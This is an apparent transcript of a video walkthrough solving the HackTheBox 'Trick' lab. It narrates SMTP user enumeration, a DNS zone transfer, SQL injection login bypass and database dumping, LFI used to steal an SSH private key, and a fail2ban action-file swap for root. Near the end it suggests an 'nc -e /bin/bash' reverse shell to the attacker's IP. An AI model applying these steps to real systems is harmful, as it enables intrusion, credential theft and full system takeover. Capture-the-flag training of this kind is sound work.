Hey guys, welcome back. Hope you all are doing well. This is Mohammad Badruddija and today we are going to solve a machine from Hackthebox. The machine name is Trick and the difficulty level of that machine is easy. This is pretty straightforward machine but a bit different from other machines because the way you enumerate that machine is a bit different. So that's been said, if you did not subscribe the channel, please subscribe the channel and hit the bell icon so you can get the notifications on time. That's been said, let's go and we start the machine with the nmap scan. As always, nmap space hyphen s capital V for version enumeration, space hyphen s capital C for default scripts, and the target IP is going to be 10.10.11.166, and I'm going to save the scan results in a file named as default.nmap. So I already ran that scan to save the time. I'm going to show you the scan result real quick. So default.nmap. Okay, so there are a few ports open, like port number 22, which is default for SSH. The service version here is OpenSSH 7.9p1, and second port is port number 25. This is again the TCP port, and the state of this port is open, and this port is default for SMTP, and it's using portfix SMTP-D service is running on it. The most important part here is SMTP command. All these SMTP commands are allowed, so we can use these SMTP commands. But the most important SMTP command here is verify, and you can also enumerate the users with this verify command. And in a minute, you will see how we can enumerate. But the third port is port number 53. This is default for domain. Actually, DNS TCP port state is open and it's using ISC bind 9.11.5. So this is DNS NSID. Now the fourth port is port number 80, default for HTTP, and the server here is NGINX 1.14.2. So that's been said, I already created a record of this target IP with the name trick.htb so that I can access this website with the name. That's been said, let's go and we will see how we can enumerate. So we will start enumeration not from this port 22 because that does not seem vulnerable. We will go and start the enumeration from this port number 25 for the SMTPD. So clear it, and to do enumeration, first of all, I'm going to show you how you can use that verify command. So using netcat, I want to connect with the target. So 10.10.11.166. I used space hyphen V for the verbosity, and I want to connect with port number 25. Fine. So as you can see, SMTP, and now the session is open. What I'm going to do is verify, and let's say root. So I actually wanna, come on, that comes really late. So okay, now verify, let's say root user. So I want to see whether root user is there or not. So as you can see, we are getting 252 response code. That means root user is there. Now to again confirm that, verify, let's say any random user, anything. So it is gonna give us 550. So 550 means user unknown in local recipient table. Fine. That means there is no user named as this. So in that way, if we pass a word list in some automated process, we can actually enumerate the actual username, right? And how we will do that? We will do that with the Hydra. So let's say Hydra SMTP enum // and trick.htb/verify, and now pass the word list. So I'm going to give it a username list. Let's say user share word list sec list usernames. Inside username there is 10 millions user dot text. Okay, and the password, let's say localhost. Fine, and just hit enter. So let it work, and we will go to see here the page source. So view page source, let's see if we find something interesting which is not here. So not anything interesting here. Okay, go back, and it start giving us results, like as you can see, Michelle user is the correct user, mail user is there, root user is there. Let it work, and we will do something else. So there is one more port open, which is port number 53. So let's go and enumerate this port number 53. So, but what is the difference? We actually hunt for subdomain with the FUF mostly, right? Space -w / user share word list seclist discovery DNS and subdomains, and then specify the URL, which is going to be trig.htb, and then we specify header, in which we specify the host, and we fuzz the subdomain like this. Okay, although this technique will not work here, right? So what else we can do? As we know that DNS port is open there and ISC bind service is running. So let's go and try dig. So dig, then we need to specify the domain name, which is trig.htb. Then with the @ we need to specify the IP address of the target where this bind service is running. So on that host it's running. Now we need to specify the switch. Okay, so AXFR for the zone transfer. So let's go and just hit enter, and once we hit enter, we found some records. So the first record is SOA record, there is NS record, name server record, this is A record, there is another A record, but this is for IPv6. There is one canonical name record, which you can also consider it as alias record, and that record is preprod-payroll.trig.htb, and this is what we are looking for. So I'm going to copy it, and let's make an entry for this record in etc host file. So echo 10.10.11.166 space, paste that subdomain, and make sure you put these two greater than sign, because you want to append this. If you just use one sign, it is going to delete rest of the thing from the file. So make sure about it. etc/host, hit enter. Now we can access this. Come back here and just paste that home http:// and hit enter. As we hit enter, we find this page, and if you remember, you might have seen this page before. So in the previous week, we solved faculty machine from Hackthebox, and that faculty machine is exactly using the same application with the same page, although this wallpaper was not there, but this was the page. So you can also go and watch that video from the faculty. Okay, and what we found in that previous video, we found that that application particularly was vulnerable to SQL injection, and there are two SQL injection vulnerability. One is Boolean based blind, and another one is time based blind SQL injection. So let's go and we try the same thing here also. If I say here admin and 1 2 3 4 5 6 and login. So once we log in, we got username and password is incorrect, of course. Now put a single quote, and that should break the syntax, SQL query syntax, and once it breaks, it should give us the syntax error, SQL error, but we will not get any error here, and that's why it's known as blind, because you cannot see the response or expected errors or warnings on the same page. But if we send this to the burp proxy, and let's without putting this single quote, just hit login, so our request is captured here. Now come here, and as you can see, the same response we found here, 3 means username and password is incorrect. I'm going to send this to the repeater. Go to the repeater. Oh, come on. Go to the repeater and send this again. Make sure everything is working fine. Now, once I put single quote here and send this request again, you will see here there is a notice. Although once you put single quote here, you will not see any notice, any warning or any error there. But here you get that. So that means SQL injection is there. So what we can do here, we already know that admin is not a valid user, or maybe the password we are entering is not correct. So the first thing we are going to do here is saying or 1 is equal to 1 dash dash space dash. So what this actually, let's put plus instead of space. So wherever you see space, put plus. Okay, single quote, it is going to break that query. It is going to say, okay, where username is equal to admin or 1 is equal to 1, then this dashes is going to comment rest of the query. So now after this, it is not going to read anything. That means it is not going to match this password. It is just going to see this condition here. Now we are using OR operator here, so that any of these condition must be true. Now the game is just between these values. So it is going to say if the username is equal to where username is equal to admin or 1 is equal to 1. So 1 is equal to 1 is always true. So even if the administrator user is not in the database, it is going to pass this query and we will get the result. So once I send this request, you can see the response is changed and we get here 1. 1 means login successful. So let's go take this payload from here, copy, come back here and paste that payload here. But here you should not need, we do not need here these plus signs, right? And just log in, and once you hit login, we logged in as administrator. Well done. Now attendance, okay, a lot of things are here. I'm just going to turn off the proxy. Okay, department, position, allow list, many things are there. But the thing is, if this application is vulnerable to SQL injection, let's go and dump the database. So the first thing first, I'm going to actually copy this whole request, come here, open new tab, paste that, save it as login.req. You can name it as you want. Okay, now go back to the terminal, SQL map space -r for the request, and the request is in login.req. Let's define the label. Let's say label is equal to 5 -- batch, because I want SQL map to answer itself, so it is not going to ask everything from us. Okay, and just say space -- dump, so it is going to dump everything. Hit enter. Although you can specify few more things here, like space -- dbms is equal to mysql. Okay, you also first fetch the current database name or current username, then you can go and switch table by table or column by column like that. But here let's do this. So as you can see, the database is dumped. Okay, you can see here few legitimate users are there, like John Smith. Rest all test. Okay, but the important part is here. You can see the username is administrator and the password is Super Gucci Rainbow Cake. This is the name administrator, but actually username is Enemigos. Okay, that's perfect. So fine, you can see here there are departments like programmers, HR supervisor, accounting clerk. These are the departments. So a lot of useful information is there, but I'm going with this. So just copy it and I'm going to paste it here with me. Paste that, save it. So username is equal to this and the password is this. Copy and paste that here. Fine. So now let's try to log in with, because the users you found here, these users are the system users, right? Like games, bin, man, backup, daemon, proxy. These users are actually the system users. So Michelle is most probably is going to be the system user. So let's go and we will try that here. Clear everything. SSH space hyphen Michelle at 10.10.11.166. Hit enter. It is going to ask us for a password. So let's try this password. Paste that, hit enter. And that's not the correct password. Okay, we can see maybe the Mitchell user is not the system user, but we can verify that also. And how we can verify? We can verify with SQL map, because if we can read the system files with the help of SQL map, so we can read etc passwd file. Let's try that. Here instead of dump and instead of batch, I'm going to say file read or read file. Let's try file read is equal to /etc/passwd. Hit enter. And yeah, there is. Do you want to confirm from the remote? Actually, we should choose here batch switch. So now, as you can see, the file is already on this path. It's saved on this path. So let's say cat and paste that path here. Hit enter, and this is the target etc passwd file. So here you can see root is there, games is there, man is there, news is there, www data is also there. Okay, and we found most of these users here in the come on here, like games, nobody, bin, man, news. Okay, postmaster, daemon. Fine, we already have it here also. So as you can see, Michelle is the legitimate user, system user. So if we can read a system file, we can also read, let's try, if the IDRSA key of Michelle is there, we can try to read that also. So let's go here. First of all, let's try batch. So we do not need to answer every time. And here, let's try home /.ssh id _ RSA. And as you can see, there is an error, no data retrieved. That means this file maybe not exist, or maybe we don't have privilege to access that file, because maybe at that instant once we are trying to read this file, maybe we are www data, not the Michelle user. Like if I come here, you can see www data user is also there. So maybe now we have privilege of www data, so that we cannot access the IDRSA file, or we cannot access the home directory of Michelle user. Okay, so we need to find out another way. Let's see. Here we have subdomain which is preprod -payload, right? So maybe there are other subdomains too, like finance, HR, preprod -hr.trick.htb, something like this. So we need to try that. So to try that, we need to have a word list which contains all possible values with preprod space hyphen added. So let's try to first of all create that word list first. I'm going to create a little file in Python. So I'm going to make it super quick. Okay, here I'm going to read a file. Let's say slash derb, and inside derb there is a file named as common.txt. Okay, and here I want to read this file, and here I'm going to read that output line by line and split on every line. Okay, now I'm going to execute here a loop. Okay, so it is going to take entries from the directory one by one, and it is going to put this preprod hyphen with this name before this name, right? And then let's again write a new file. So with open, let's say append here as out file 2, and here we are going to write, instead of read, here we are going to write. So write new directory, comma, not comma, plus and new line. So it will make every entry in the new line. That's it. And where we want to save this file, let's say in root desktop /htb / trick, and inside trick let's say subdomain.txt. Fine. Save this file as subdomains.py, something like this. Okay, now let's try to execute this file. Python 3 subdomains.py, hit enter. Command not found. Why? Because I write something wrong. PATHON. Yeah. So now it's going to make a file here named as subdomain.txt, and if we open that file, you can see it is going to add pre-prod before every entry of this file. Fine. So now let's go, and we are going to pass this, clear that. Now I'm going to use fuf. So fuf space -w. So the word list is going to be subdomains.txt, and space -url is going to be htb, and header host first.trick.htb. Actually, the mic is just in front of me, so I rarely see my keyboard. Very sorry for that. Okay, number of threads 40. That's perfect. Hit enter. Control C, because everything is 200. So we can again filter the result, okay, with the words. So 1697, clear that, come here, space -fw means filter word 1697, hit enter, and hope for the best. We should get here some subdomain. Okay, so we find one. This is preprod -marketing. So let's go and create this subdomain entry again in etc host file. So echo, paste that, preprod -marketing dot trick dot htb. Okay, and save it /etc/ hosts, and yeah, no, that's wrong. We must specify here the target IP. Now that's perfect. Hit enter. Now let's try to connect with that. So http:// preprod -marketing dot trick dot htb, hit enter, and yes, this is another application, business oriented, home, service, about, contact. There is a form, submit. So one thing is interesting. Say what? There is, in the URL you can see there is a parameter page, and it is rendering this page, right? So the first thing comes into my mind is maybe this parameter is vulnerable for LFI. So let's test this, and I am going to test it with LFI map. So cd/opt cd/LFI map, LFI map, just this, clear that, and let's say python 3 LFI map, and specify the URL, which is going to be this URL. Copy that, paste that here. Okay, and instead of this value, this parameter value, I'm going to put here pon. Same like what we do in the fuf command. Whatever we want to enumerate or fuzz, we put fuzz there. Here in LFI map, we just put here pwn, and let's specify a switch, which is space -a, and just hit enter and let it work. Okay, and as you can see here, we find that this parameter is actually vulnerable for LFI, and this is going to be the payload to read the files. So let's try that. I'm going to copy this, copy selection, come back here, and instead of contact.html, just paste that here, hit enter, and voila, we got that. So view page source, and this is the target etc passwd file, and here, as you can see, Michelle user is there. So we can read more files like etc host, hit enter. Yeah, trick is there. So if we can read system files from here also, maybe we can read the Michelle IDRSA file. So let's try that. /home /Michelle /.ssh/id_RSA, and yeah, we got that. So view page source, copy this file, copy that, come back here, here, delete that, new, paste that, and just save it as id_RSA. Okay, come back here, now we don't need that. Clear this, chmod 600 id_RSA, and now let's try to log in with this private key of Michelle. Okay, and we logged in. So if I say ls space -la, there is user flag. So cat user.text. Okay, clear that, id. Wow, that's interesting, because once we try id command, you can see Michelle is a member of security group. Let's see what this security group can do. So find /group, and the group name is security /dev/null, hit enter, and this group have permission on action.d, and there is fail to ban running. What is action.d? ls space -la, etc fail to ban, paste selection, hit enter. That seems a directory. That means clear that, and if I just access that, so action.d is a directory, and that directory root is the owner, but the users in the security group can also read, write, and execute in this directory. Fine, but what we can read, write, and execute, we need to figure that out. Sudo space -l, and yeah, that's it. So now we have three things. id. So this is the first thing. Copy and come back here, paste that. The second thing is this one. So copy, paste that here, and this is the third and final part. So copy and paste it here. So Michelle user is a member of security group, and security group can read, write, and execute in this directory, and Michelle can execute this binary, fail to ban, restart. Means Michelle user can restart fail to ban service with the sudo as root with no password. Okay, so, and these two are connected. Okay, so let's go, and first of all we see the fail to ban configuration file. Okay, so clear that, exit this one, and also exit this. Okay, so the fail to ban configuration file is inside etc fail to ban. So cat /etc failed to ban, and the file name is failtoban.conf, I think. Yeah, this one. So paste that, hit enter. Yeah, this is the file. The other file, the other configuration file is this one. So this is the first configuration file for failed to ban, and there is one more configuration file which is jail.conf. So this is the configuration file where the administrator specify that in what conditions user should be banned. So clear that and cat it again, but this time we are going to access jail.conf, this configuration file. So now go up, and from the beginning we will see that if user make multiple times login attempt, failed login attempt, it is going to ban that user. Okay. Okay, so this is the service, this is the ban time. Now before paths debian.conf, okay, default. So what is the default configuration here is ban time is 10 seconds, find time is 10 seconds, maximum retries are 5, and find time is 10 seconds. So if a user make 5 failed login attempt within 10 seconds, it is going to ban that user for the 10 seconds. Okay, so this is the thing. And other important part here is login coding is auto. Another thing is action. So once it find that okay, one user make more than 5 login attempts within 10 seconds, what action it should take? So that action is going to be defined here. So it is going to first of all send a mail to the root user from this email. Okay, using send mail protocol is going to be TCP with the chain using this port, and fail to ban agent is this with the fail to ban version. Now this is the important part. So what is going to be the ban action? So the ban action is going to be from the IP tables multiport. Okay, so IP table multiport, this is again a file of IP table, okay, in which it is going to define some rules of IP tables. So now we need to see this file, IP tables hyphen multiports. So clear that. So let's go first of all in etc slash fail to ban. Okay, ls space hyphen la. Okay, in action.d, cd action.d. So we are in action.d, ls space hyphen la, and here we find one file which is iptables multiport logconf. So let's see what's inside this file, and as you can see the owner of this file is root and the group is root. So we cannot edit this file, but we can create that file. And what we see here, cat dot slash jail.conf, what we see in that file, here in the action section we can see the action is taken by that configuration file is using file iptables hyphen multiport. Let's see the content of that file. So cat iptables hyphen multiport hyphen log.conf. So this is the file. So I'm going to take this file. Let's take all of this. Okay, and I'm going to save it. Action check, action ban, come here, new, paste that. Okay, and what we are going to modify here is action ban, this one. So instead of that, I'm gonna say chmod u plus s and /bin/bash. Okay, save it as iptables hyphen multiport.conf. Okay, cd/dev/shm, and let's wget here 10.10.14.217 slash iptables hyphen multiport.conf. Okay, now what we need to do here is we need to change it chmod 777 iptables multiport.conf. Fine. Now ls space hyphen la. Okay, it's changed. Now we just need to put it there. Copy that iptables file and send it to paste it into etc fail to ban action.d and hit enter. cp cannot create regular file, permission denied. Let's try to move it. mv, and it's replaced. Yes, sudo space hyphen l. So we need to execute this command with the sudo. Copy that sudo and paste it, hit enter. And here what we need to do is hydra space hyphen l is going to be Michelle space hyphen capital P for the word list. So user share word list, derb slash common any word list, because we want failed login attempt, and ssh colon slash slash 10.10.11.166. hit enter. Okay, it's started. ls space hyphen la slash bin slash bash, because we try to, and as you can see this time SUID bit is set because the failed login attempt has done, and the system found 5 failed login attempt within 10 seconds. Now slash bin slash bash, here SUID bit is already set. Bash space hyphen p, hit enter. Who am I? And I'm root. So cd slash root ls space hyphen la, and we should have root.txt here. So clear cat root.txt, hit enter, and this is the root flag. So that's it for this machine. You can also try few other ways, like what you can do. Here this is the file. So in the ban action, instead of chmod, you can try reverse shell payload like nc space hyphen e slash bin slash bash, and then your IP address. So here my IP address was 217 on port number, let's say 9090, and save this file on the target on the same location within the action.d, and restart the service. Try hydra to make failed login attempt within 10 seconds, more than 5 login attempts. So the system will execute jail.conf file, and then it is going to execute this payload, and you will get the reverse shell as root. So that's it. If you like the content, please like, subscribe and share. See you in the next video. Bye.